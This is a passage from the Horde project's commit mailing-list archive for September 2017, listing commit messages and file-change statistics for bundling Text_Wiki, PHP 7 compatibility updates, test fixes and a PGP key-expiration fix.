 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Latex/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Latex/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Blockquote.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Bold.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Code.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Deflist.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Emphasis.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Freelink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Horiz.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Links.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/List.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Newline.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Paragraph.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Raw.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Tt.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Url.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Interwiki.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Url.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Wikilink2.php

http://github.com/horde/horde/commit/f8bbefdb445773d851083ede7e348a9f9507d431

-----------------------------------------------------------------------

commit 37ffba5d3842a656a8c50f9244bc4f567b738c23
Author: Jan Schneider 
Date:   Wed Sep 6 10:07:23 2017 +0200

    Use PHP 5 constructors in our own parsers too.

 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Attribute.php    | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Attribute.php    | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Attribute.php    | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Attribute.php   | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Attribute.php | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Attribute.php      | 2 +-
 6 files changed, 6 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/37ffba5d3842a656a8c50f9244bc4f567b738c23

-----------------------------------------------------------------------

commit b3958bac9274dd7c7ccce5d905ed1f7fc0626c7d
Author: Jan Schneider 
Date:   Wed Sep 6 10:08:23 2017 +0200

    Load the bundled Text_Wiki.

 wicked/lib/Application.php | 17 +++++++++++++++++
 wicked/lib/Page.php        | 14 --------------
 2 files changed, 17 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/b3958bac9274dd7c7ccce5d905ed1f7fc0626c7d

-----------------------------------------------------------------------

commit 5a94b41cd514ad3beab779677c747efb72125d0f
Author: Jan Schneider 
Date:   Wed Sep 6 11:04:57 2017 +0200

    [jan] Bundle Text_Wiki and fix it to run on PHP 7.

 wicked/docs/CHANGES | 1 +
 wicked/package.xml  | 2 ++
 2 files changed, 3 insertions(+)

http://github.com/horde/horde/commit/5a94b41cd514ad3beab779677c747efb72125d0f

-----------------------------------------------------------------------

commit 1321c0efcade317162ca607f3f618f20eee1d759
Author: Jan Schneider 
Date:   Wed Sep 6 11:06:05 2017 +0200

    Remove Text_Wiki dependency.

 wicked/package.xml | 20 --------------------
 1 file changed, 20 deletions(-)

http://github.com/horde/horde/commit/1321c0efcade317162ca607f3f618f20eee1d759

-----------------------------------------------------------------------

commit d0e34d92025796ebb0de193d2a82a61fc88c0190
Author: Jan Schneider 
Date:   Wed Sep 6 11:09:08 2017 +0200

    Update file list.

 wicked/package.xml | 1610 ++++++++++++++++++++++++++++++++++++++++++++++------
 1 file changed, 1435 insertions(+), 175 deletions(-)

http://github.com/horde/horde/commit/d0e34d92025796ebb0de193d2a82a61fc88c0190



From jan at horde.org  Wed Sep  6 09:31:38 2017
From: jan at horde.org (Jan Schneider)
Date: Wed,  6 Sep 2017 11:31:38 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	4a7778358776e9206afec5df15c6a120f4e31e1d
Message-ID: <20170906093138.9C736100BF1@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 3c1556861e7cb7f86429a1807940b89d8cf0bdfb

044ea62 [jan] Bundle Text_Wiki and fix it to run on PHP 7.
f2b5faa4 Remove Text_Wiki dependency.
4a77783 Update file list.

Summary: http://github.com/horde/horde/compare/3c1556861e7cb7f86429a1807940b89d8cf0bdfb...4a7778358776e9206afec5df15c6a120f4e31e1d

-----------------------------------------------------------------------

commit 044ea62b5c37987461a317008bd5908448328819
Author: Jan Schneider 
Date:   Wed Sep 6 11:04:57 2017 +0200

    [jan] Bundle Text_Wiki and fix it to run on PHP 7.

 wicked/docs/CHANGES | 22 ++++++++++++++++++++++
 wicked/package.xml  | 18 ++++++++++++++++--
 2 files changed, 38 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/044ea62b5c37987461a317008bd5908448328819

-----------------------------------------------------------------------

commit f2b5faa4d8deeecdfabe4466dfa99455b4cba906
Author: Jan Schneider 
Date:   Wed Sep 6 11:06:05 2017 +0200

    Remove Text_Wiki dependency.

 wicked/package.xml | 20 --------------------
 1 file changed, 20 deletions(-)

http://github.com/horde/horde/commit/f2b5faa4d8deeecdfabe4466dfa99455b4cba906

-----------------------------------------------------------------------

commit 4a7778358776e9206afec5df15c6a120f4e31e1d
Author: Jan Schneider 
Date:   Wed Sep 6 11:31:21 2017 +0200

    Update file list.

 wicked/package.xml | 1670 +++++++++++++++++++++++++++++++++++++++++++++-------
 1 file changed, 1465 insertions(+), 205 deletions(-)

http://github.com/horde/horde/commit/4a7778358776e9206afec5df15c6a120f4e31e1d



From jan at horde.org  Wed Sep  6 10:18:23 2017
From: jan at horde.org (Jan Schneider)
Date: Wed,  6 Sep 2017 12:18:23 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	ef2bf8004e51d8cfefb2b095e5052a7a88c487fb
Message-ID: <20170906101823.7267A100BF2@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: d0e34d92025796ebb0de193d2a82a61fc88c0190

5aa0f3a Update dependencies.
ef2bf80 Update tests.

Summary: http://github.com/horde/horde/compare/d0e34d92025796ebb0de193d2a82a61fc88c0190...ef2bf8004e51d8cfefb2b095e5052a7a88c487fb

-----------------------------------------------------------------------

commit 5aa0f3a593a50094b028d03b911ae443a9cfd902
Author: Jan Schneider 
Date:   Wed Sep 6 11:57:58 2017 +0200

    Update dependencies.

 wicked/docs/INSTALL | 11 +++++++----
 wicked/lib/Test.php | 29 ++---------------------------
 2 files changed, 9 insertions(+), 31 deletions(-)

http://github.com/horde/horde/commit/5aa0f3a593a50094b028d03b911ae443a9cfd902

-----------------------------------------------------------------------

commit ef2bf8004e51d8cfefb2b095e5052a7a88c487fb
Author: Jan Schneider 
Date:   Wed Sep 6 12:18:08 2017 +0200

    Update tests.

 wicked/test/Wicked/Autoload.php     |  2 +-
 wicked/test/Wicked/TestCase.php     | 10 +++-
 wicked/test/Wicked/Unit/RstTest.php | 97 ++++++++++++++++---------------------
 3 files changed, 51 insertions(+), 58 deletions(-)

http://github.com/horde/horde/commit/ef2bf8004e51d8cfefb2b095e5052a7a88c487fb



From jan at horde.org  Wed Sep  6 10:29:34 2017
From: jan at horde.org (Jan Schneider)
Date: Wed,  6 Sep 2017 12:29:34 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	ea011b0e858b877e74fca5d9f8bea8133072ee8a
Message-ID: <20170906102934.E5C9E100BF2@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 4a7778358776e9206afec5df15c6a120f4e31e1d

4a3cdd6 Disable ext/ldap temporarily.
ac19a01 Update dependencies.
ea011b0 Update tests.

Summary: http://github.com/horde/horde/compare/4a7778358776e9206afec5df15c6a120f4e31e1d...ea011b0e858b877e74fca5d9f8bea8133072ee8a

-----------------------------------------------------------------------

commit 4a3cdd636aaaef9807c56fc98fc89acba9065fd0
Author: Jan Schneider 
Date:   Wed Sep 6 12:27:02 2017 +0200

    Disable ext/ldap temporarily.

 .travis.ini      | 2 +-
 .travis.php7.ini | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/4a3cdd636aaaef9807c56fc98fc89acba9065fd0

-----------------------------------------------------------------------

commit ac19a01642350a5a851f0b26fdc4e9395cfebcc3
Author: Jan Schneider 
Date:   Wed Sep 6 11:57:58 2017 +0200

    Update dependencies.

 wicked/docs/INSTALL | 11 +++++++----
 wicked/lib/Test.php | 29 ++---------------------------
 2 files changed, 9 insertions(+), 31 deletions(-)

http://github.com/horde/horde/commit/ac19a01642350a5a851f0b26fdc4e9395cfebcc3

-----------------------------------------------------------------------

commit ea011b0e858b877e74fca5d9f8bea8133072ee8a
Author: Jan Schneider 
Date:   Wed Sep 6 12:18:08 2017 +0200

    Update tests.

 wicked/test/Wicked/Autoload.php     |  2 +-
 wicked/test/Wicked/TestCase.php     | 10 +++-
 wicked/test/Wicked/Unit/RstTest.php | 96 ++++++++++++++++---------------------
 3 files changed, 51 insertions(+), 57 deletions(-)

http://github.com/horde/horde/commit/ea011b0e858b877e74fca5d9f8bea8133072ee8a



From jan at horde.org  Wed Sep  6 12:13:47 2017
From: jan at horde.org (Jan Schneider)
Date: Wed,  6 Sep 2017 14:13:47 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	206400371c4815e81b12e93ac5bfc099658acba9
Message-ID: <20170906121352.54C66100BF2@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: ea011b0e858b877e74fca5d9f8bea8133072ee8a

bdd86dc Remove conflict marker.
7fc26b3 Fix package names.
2064003 Trusty doesn't work.

Summary: http://github.com/horde/horde/compare/ea011b0e858b877e74fca5d9f8bea8133072ee8a...206400371c4815e81b12e93ac5bfc099658acba9

-----------------------------------------------------------------------

commit bdd86dcd43cdbe00fa4b89d014533d89d929adfa
Author: Jan Schneider 
Date:   Wed Sep 6 12:53:04 2017 +0200

    Remove conflict marker.

 wicked/docs/CHANGES | 1 -
 1 file changed, 1 deletion(-)

http://github.com/horde/horde/commit/bdd86dcd43cdbe00fa4b89d014533d89d929adfa

-----------------------------------------------------------------------

commit 7fc26b32445aca79c48cf91077a628b0c29161ec
Author: Jan Schneider 
Date:   Wed Sep 6 12:53:42 2017 +0200

    Fix package names.

 timeobjects/lib/Factory/Driver.php | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/7fc26b32445aca79c48cf91077a628b0c29161ec

-----------------------------------------------------------------------

commit 206400371c4815e81b12e93ac5bfc099658acba9
Author: Jan Schneider 
Date:   Wed Sep 6 14:12:40 2017 +0200

    Trusty doesn't work.
    
    Trusty builds don't work due to travis-ci/travis-ci#7067 still not being fixed.

 .travis.yml | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/206400371c4815e81b12e93ac5bfc099658acba9



From jan at horde.org  Wed Sep  6 12:31:18 2017
From: jan at horde.org (Jan Schneider)
Date: Wed,  6 Sep 2017 14:31:18 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	2e8ab4e6d87102924b579a7fc4b16427f345e951
Message-ID: <20170906123118.C0EFB100BF2@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 206400371c4815e81b12e93ac5bfc099658acba9

2e8ab4e Consider all remaining libaries as PHP 7 compatible.

Summary: http://github.com/horde/horde/compare/206400371c4815e81b12e93ac5bfc099658acba9...2e8ab4e6d87102924b579a7fc4b16427f345e951

-----------------------------------------------------------------------

commit 2e8ab4e6d87102924b579a7fc4b16427f345e951
Author: Jan Schneider 
Date:   Wed Sep 6 14:31:06 2017 +0200

    Consider all remaining libaries as PHP 7 compatible.

 framework/Autoloader_Cache/package.xml     | 8 ++++----
 framework/Browser/package.xml              | 8 ++++----
 framework/CssMinify/package.xml            | 8 ++++----
 framework/Editor/package.xml               | 8 ++++----
 framework/ElasticSearch/package.xml        | 8 ++++----
 framework/Imsp/package.xml                 | 8 ++++----
 framework/JavascriptMinify/package.xml     | 8 ++++----
 framework/Lens/package.xml                 | 6 +++---
 framework/Oauth/package.xml                | 8 ++++----
 framework/OpenXchange/package.xml          | 8 ++++----
 framework/Queue/package.xml                | 8 ++++----
 framework/Rampage/package.xml              | 5 +++--
 framework/Reflection/package.xml           | 6 +++---
 framework/Scheduler/package.xml            | 8 ++++----
 framework/Scribe/package.xml               | 8 ++++----
 framework/Service_Facebook/package.xml     | 8 ++++----
 framework/Service_Twitter/package.xml      | 8 ++++----
 framework/Service_UrlShortener/package.xml | 8 ++++----
 framework/Service_Vimeo/package.xml        | 8 ++++----
 framework/Stringprep/package.xml           | 8 ++++----
 framework/Thrift/package.xml               | 8 ++++----
 framework/Tree/package.xml                 | 8 ++++----
 22 files changed, 85 insertions(+), 84 deletions(-)

http://github.com/horde/horde/commit/2e8ab4e6d87102924b579a7fc4b16427f345e951



From jan at horde.org  Wed Sep  6 12:34:01 2017
From: jan at horde.org (Jan Schneider)
Date: Wed,  6 Sep 2017 14:34:01 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	9407ee3e7676ad2d8167fe800af84fef2d9793d4
Message-ID: <20170906123401.6B916100BF2@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: ef2bf8004e51d8cfefb2b095e5052a7a88c487fb

eb1cb55 Fix package names.
9407ee3 Consider all applications as PHP 7 compatible.

Summary: http://github.com/horde/horde/compare/ef2bf8004e51d8cfefb2b095e5052a7a88c487fb...9407ee3e7676ad2d8167fe800af84fef2d9793d4

-----------------------------------------------------------------------

commit eb1cb551f85b35a236c38fd32e715add2eaa6b48
Author: Jan Schneider 
Date:   Wed Sep 6 12:53:42 2017 +0200

    Fix package names.

 timeobjects/lib/Factory/Driver.php | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/eb1cb551f85b35a236c38fd32e715add2eaa6b48

-----------------------------------------------------------------------

commit 9407ee3e7676ad2d8167fe800af84fef2d9793d4
Author: Jan Schneider 
Date:   Wed Sep 6 14:33:48 2017 +0200

    Consider all applications as PHP 7 compatible.

 ansel/docs/CHANGES                |  1 +
 ansel/package.xml                 | 12 ++++++------
 beatnik/docs/CHANGES              |  1 +
 beatnik/package.xml               | 10 ++++++----
 bundles/groupware/docs/CHANGES    |  1 +
 bundles/groupware/package.xml     |  8 ++++----
 bundles/kolab_webmail/package.xml |  6 ++++--
 bundles/webmail/docs/CHANGES      |  1 +
 bundles/webmail/package.xml       |  8 ++++----
 chora/docs/CHANGES                |  1 +
 chora/package.xml                 |  6 ++++--
 components/package.xml            |  6 ++++--
 content/docs/CHANGES              |  1 +
 content/package.xml               |  8 ++++----
 gollem/docs/CHANGES               |  1 +
 gollem/package.xml                | 12 ++++++------
 hermes/docs/CHANGES               |  1 +
 hermes/package.xml                | 10 ++++++----
 horde/docs/CHANGES                |  1 +
 horde/package.xml                 |  8 ++++----
 imp/docs/CHANGES                  |  1 +
 imp/package.xml                   | 12 ++++++------
 ingo/docs/CHANGES                 |  1 +
 ingo/package.xml                  | 12 ++++++------
 jonah/docs/CHANGES                |  1 +
 jonah/package.xml                 |  6 ++++--
 kolab/docs/CHANGES                |  1 +
 kolab/package.xml                 |  6 ++++--
 koward/package.xml                |  5 +++--
 kronolith/docs/CHANGES            |  1 +
 kronolith/package.xml             | 10 ++++++----
 mnemo/docs/CHANGES                |  1 +
 mnemo/package.xml                 | 10 ++++++----
 nag/docs/CHANGES                  |  1 +
 nag/package.xml                   | 12 ++++++------
 passwd/docs/CHANGES               |  1 +
 passwd/package.xml                | 10 ++++++----
 pastie/docs/CHANGES               |  1 +
 pastie/package.xml                |  6 ++++--
 sam/docs/CHANGES                  |  1 +
 sam/package.xml                   | 10 ++++++----
 sesha/docs/CHANGES                |  1 +
 sesha/package.xml                 | 10 ++++++----
 timeobjects/docs/CHANGES          |  1 +
 timeobjects/package.xml           |  8 ++++----
 trean/docs/CHANGES                |  1 +
 trean/package.xml                 | 12 ++++++------
 turba/docs/CHANGES                |  1 +
 turba/package.xml                 | 12 ++++++------
 ulaform/docs/CHANGES              |  1 +
 ulaform/package.xml               | 10 ++++++----
 whups/docs/CHANGES                |  1 +
 whups/package.xml                 | 12 ++++++------
 wicked/docs/CHANGES               |  1 +
 wicked/package.xml                | 10 ++++++----
 55 files changed, 175 insertions(+), 118 deletions(-)

http://github.com/horde/horde/commit/9407ee3e7676ad2d8167fe800af84fef2d9793d4



From jan at horde.org  Wed Sep  6 23:18:52 2017
From: jan at horde.org (Jan Schneider)
Date: Thu,  7 Sep 2017 01:18:52 +0200 (CEST)
Subject: [commits] Horde Web Source branch master updated.
	cc49a704568fd867b9c63ba8231d526941fd18f0
Message-ID: <20170906231852.CB5FC100BC9@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: c1d1a7ef754e25a25e81d16f0997197cd4571a55

cc49a70 Crontab: update documentation files.

Summary: http://github.com/horde/horde-web/compare/c1d1a7ef754e25a25e81d16f0997197cd4571a55...cc49a704568fd867b9c63ba8231d526941fd18f0

-----------------------------------------------------------------------

commit cc49a704568fd867b9c63ba8231d526941fd18f0
Author: Jan Schneider 
Date:   Thu Sep 7 01:18:46 2017 +0200

    Crontab: update documentation files.

 app/views/App/apps/ansel/docs/CHANGES.html     |  1 +
 app/views/App/apps/chora/docs/CHANGES.html     |  1 +
 app/views/App/apps/gollem/docs/CHANGES.html    |  1 +
 app/views/App/apps/groupware/docs/CHANGES.html |  1 +
 app/views/App/apps/hermes/docs/CHANGES.html    |  1 +
 app/views/App/apps/horde/docs/CHANGES.html     |  1 +
 app/views/App/apps/imp/docs/CHANGES.html       |  1 +
 app/views/App/apps/ingo/docs/CHANGES.html      |  1 +
 app/views/App/apps/kronolith/docs/CHANGES.html |  1 +
 app/views/App/apps/mnemo/docs/CHANGES.html     |  1 +
 app/views/App/apps/nag/docs/CHANGES.html       |  1 +
 app/views/App/apps/passwd/docs/CHANGES.html    |  1 +
 app/views/App/apps/sesha/docs/CHANGES.html     |  1 +
 app/views/App/apps/trean/docs/CHANGES.html     |  1 +
 app/views/App/apps/turba/docs/CHANGES.html     |  1 +
 app/views/App/apps/webmail/docs/CHANGES.html   |  1 +
 app/views/App/apps/whups/docs/CHANGES.html     |  1 +
 app/views/App/apps/wicked/docs/CHANGES.html    |  2 ++
 app/views/App/apps/wicked/docs/INSTALL.html    | 10 +++++++---
 19 files changed, 26 insertions(+), 3 deletions(-)

http://github.com/horde/horde-web/commit/cc49a704568fd867b9c63ba8231d526941fd18f0



From jan at horde.org  Thu Sep  7 13:25:32 2017
From: jan at horde.org (Jan Schneider)
Date: Thu,  7 Sep 2017 15:25:32 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	6346d528f8ff07c11ae680f6a3c9b6f2aed8322b
Message-ID: <20170907132532.E6AB4100DB2@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 2e8ab4e6d87102924b579a7fc4b16427f345e951

6346d52 Consider all applications as PHP 7 compatible.

Summary: http://github.com/horde/horde/compare/2e8ab4e6d87102924b579a7fc4b16427f345e951...6346d528f8ff07c11ae680f6a3c9b6f2aed8322b

-----------------------------------------------------------------------

commit 6346d528f8ff07c11ae680f6a3c9b6f2aed8322b
Author: Jan Schneider 
Date:   Wed Sep 6 14:33:48 2017 +0200

    Consider all applications as PHP 7 compatible.

 ansel/docs/CHANGES       |  9 ++++++++-
 ansel/package.xml        | 23 ++++++++++++++++++-----
 beatnik/docs/CHANGES     |  1 +
 beatnik/package.xml      |  8 ++------
 chora/docs/CHANGES       |  1 +
 chora/package.xml        |  6 ++++--
 components/package.xml   |  2 ++
 content/docs/CHANGES     |  5 +++++
 content/package.xml      |  8 ++++----
 gollem/docs/CHANGES      |  6 ++++++
 gollem/package.xml       | 38 ++++++++++++++++++++++++++++++++------
 hermes/docs/CHANGES      |  1 +
 hermes/package.xml       |  6 ++++--
 horde/docs/CHANGES       |  7 +++++++
 horde/package.xml        | 19 ++++++++++++++++---
 imp/docs/CHANGES         | 24 ++++++++++++++++++++++++
 imp/package.xml          | 34 +++++++++++++++++++++++++++++++---
 ingo/docs/CHANGES        |  8 ++++++++
 ingo/package.xml         | 19 ++++++++++++++++---
 jonah/docs/CHANGES       |  1 +
 jonah/package.xml        |  6 ++++--
 koward/package.xml       |  5 +++--
 kronolith/package.xml    |  5 +++--
 mnemo/package.xml        |  5 +++--
 nag/docs/CHANGES         | 13 +++++++++++++
 nag/package.xml          | 19 ++++++++++++++++---
 passwd/package.xml       |  5 +++--
 pastie/docs/CHANGES      |  1 +
 pastie/package.xml       |  6 ++++--
 sam/docs/CHANGES         |  1 +
 sam/package.xml          |  8 ++------
 sesha/docs/CHANGES       |  1 +
 sesha/package.xml        |  6 ++++--
 timeobjects/docs/CHANGES |  1 +
 timeobjects/package.xml  |  8 ++++----
 trean/docs/CHANGES       |  7 +++++++
 trean/package.xml        | 19 ++++++++++++++++---
 turba/docs/CHANGES       |  8 ++++++++
 turba/package.xml        | 19 ++++++++++++++++---
 ulaform/docs/CHANGES     |  1 +
 ulaform/package.xml      |  6 ++++--
 whups/docs/CHANGES       | 10 ++++++++++
 whups/package.xml        | 19 ++++++++++++++++---
 wicked/package.xml       |  5 +++--
 44 files changed, 335 insertions(+), 75 deletions(-)

http://github.com/horde/horde/commit/6346d528f8ff07c11ae680f6a3c9b6f2aed8322b



From jan at horde.org  Thu Sep  7 14:55:32 2017
From: jan at horde.org (Jan Schneider)
Date: Thu,  7 Sep 2017 16:55:32 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	e2ce5ece722739e227a1feada4b0cb6ec5d4836b
Message-ID: <20170907145532.79990100DB2@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: 9407ee3e7676ad2d8167fe800af84fef2d9793d4

e2ce5ec Accidentally changed the maximum Horde dep too.

Summary: http://github.com/horde/horde/compare/9407ee3e7676ad2d8167fe800af84fef2d9793d4...e2ce5ece722739e227a1feada4b0cb6ec5d4836b

-----------------------------------------------------------------------

commit e2ce5ece722739e227a1feada4b0cb6ec5d4836b
Author: Jan Schneider 
Date:   Thu Sep 7 16:54:51 2017 +0200

    Accidentally changed the maximum Horde dep too.

 ansel/package.xml     | 4 ++--
 beatnik/package.xml   | 4 ++--
 gollem/package.xml    | 4 ++--
 hermes/package.xml    | 4 ++--
 imp/package.xml       | 4 ++--
 ingo/package.xml      | 4 ++--
 kronolith/package.xml | 2 +-
 mnemo/package.xml     | 4 ++--
 nag/package.xml       | 4 ++--
 passwd/package.xml    | 4 ++--
 sam/package.xml       | 4 ++--
 sesha/package.xml     | 4 ++--
 trean/package.xml     | 4 ++--
 turba/package.xml     | 4 ++--
 ulaform/package.xml   | 4 ++--
 whups/package.xml     | 4 ++--
 wicked/package.xml    | 4 ++--
 17 files changed, 33 insertions(+), 33 deletions(-)

http://github.com/horde/horde/commit/e2ce5ece722739e227a1feada4b0cb6ec5d4836b



From jan at horde.org  Thu Sep  7 17:35:40 2017
From: jan at horde.org (Jan Schneider)
Date: Thu,  7 Sep 2017 19:35:40 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	c978c41df754fe7ac8748b97a07f869c8a3df22c
Message-ID: <20170907173540.CBD05100DB2@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 6346d528f8ff07c11ae680f6a3c9b6f2aed8322b

c7b3078 Add test for key generation.
7defb5a Unused
dc1ee8e Save whether this is GnuPG 2.1+.
c978c41 [jan] Correctly determine expiration dates of short living PGP keys.

Summary: http://github.com/horde/horde/compare/6346d528f8ff07c11ae680f6a3c9b6f2aed8322b...c978c41df754fe7ac8748b97a07f869c8a3df22c

-----------------------------------------------------------------------

commit c7b3078df70b16367128a21242eae1a46df7a46a
Author: Jan Schneider 
Date:   Thu Sep 7 19:32:13 2017 +0200

    Add test for key generation.

 .../Crypt/lib/Horde/Crypt/Pgp/Backend/Binary.php   |  2 +-
 framework/Crypt/test/Horde/Crypt/Pgp/TestBase.php  | 36 ++++++++++++++++++++++
 2 files changed, 37 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/c7b3078df70b16367128a21242eae1a46df7a46a

-----------------------------------------------------------------------

commit 7defb5a2b8b05035931ae384127dfd9c2399ece6
Author: Jan Schneider 
Date:   Thu Sep 7 19:32:36 2017 +0200

    Unused

 framework/Crypt/lib/Horde/Crypt/Pgp/Backend/Binary.php | 2 --
 1 file changed, 2 deletions(-)

http://github.com/horde/horde/commit/7defb5a2b8b05035931ae384127dfd9c2399ece6

-----------------------------------------------------------------------

commit dc1ee8e4b88730b36121f6caf49b8204290decac
Author: Jan Schneider 
Date:   Thu Sep 7 19:33:22 2017 +0200

    Save whether this is GnuPG 2.1+.

 framework/Crypt/lib/Horde/Crypt/Pgp/Backend/Binary.php | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/dc1ee8e4b88730b36121f6caf49b8204290decac

-----------------------------------------------------------------------

commit c978c41df754fe7ac8748b97a07f869c8a3df22c
Author: Jan Schneider 
Date:   Thu Sep 7 19:35:17 2017 +0200

    [jan] Correctly determine expiration dates of short living PGP keys.

 framework/Crypt/lib/Horde/Crypt/Pgp/Backend/Binary.php | 6 ++----
 framework/Crypt/package.xml                            | 4 ++--
 2 files changed, 4 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/c978c41df754fe7ac8748b97a07f869c8a3df22c



From wikiguest at horde.org  Mon Sep 11 16:55:43 2017
From: wikiguest at horde.org (Wiki Guest)
Date: Mon, 11 Sep 2017 16:55:43 +0000
Subject: [commits] [Wiki] created: rte/RTE_popup_file_atch.asp
Message-ID: <20170911165543.Horde.y2K8EquwJLOxiSziDuhTNKJ@wiki.horde.org>

